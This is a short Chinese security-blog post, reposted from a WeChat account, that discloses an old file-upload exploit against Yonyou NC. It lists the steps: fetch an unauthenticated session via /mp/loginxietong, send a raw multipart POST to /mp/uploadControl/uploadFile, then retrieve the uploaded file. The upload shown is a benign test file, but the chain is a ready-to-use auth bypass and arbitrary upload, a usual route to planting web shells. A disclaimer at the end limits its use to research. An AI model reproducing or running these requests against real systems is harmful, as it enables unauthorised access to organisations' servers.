最近看到网上有人爆出这个漏洞利用的部分问题,索性公开。
还好当时发给同事的记录还在(笔记忘了记录)。
漏洞已经是老洞了22年挖的。
当时没有记录过程,直接贴步骤,一步到胃。
第一步
/mp/loginxietong?username=a
访问这个地址,产生一个合法的session。
第二步
进行文件上传,需要自行加入,第一步返回的cookie
POST /mp/uploadControl/uploadFile HTTP/1.1
Host: host
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=--------828642372
Content-Length: 113
----------828642372
Content-Disposition: form-data; name="file";filename="1.txt"
123
----------828642372--
第三步
访问/mp/uploadFileDir/1.txt
完事,太过久远不一定存在。
原文始发于微信公众号(安全学习与分享):用友nc文件上传
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论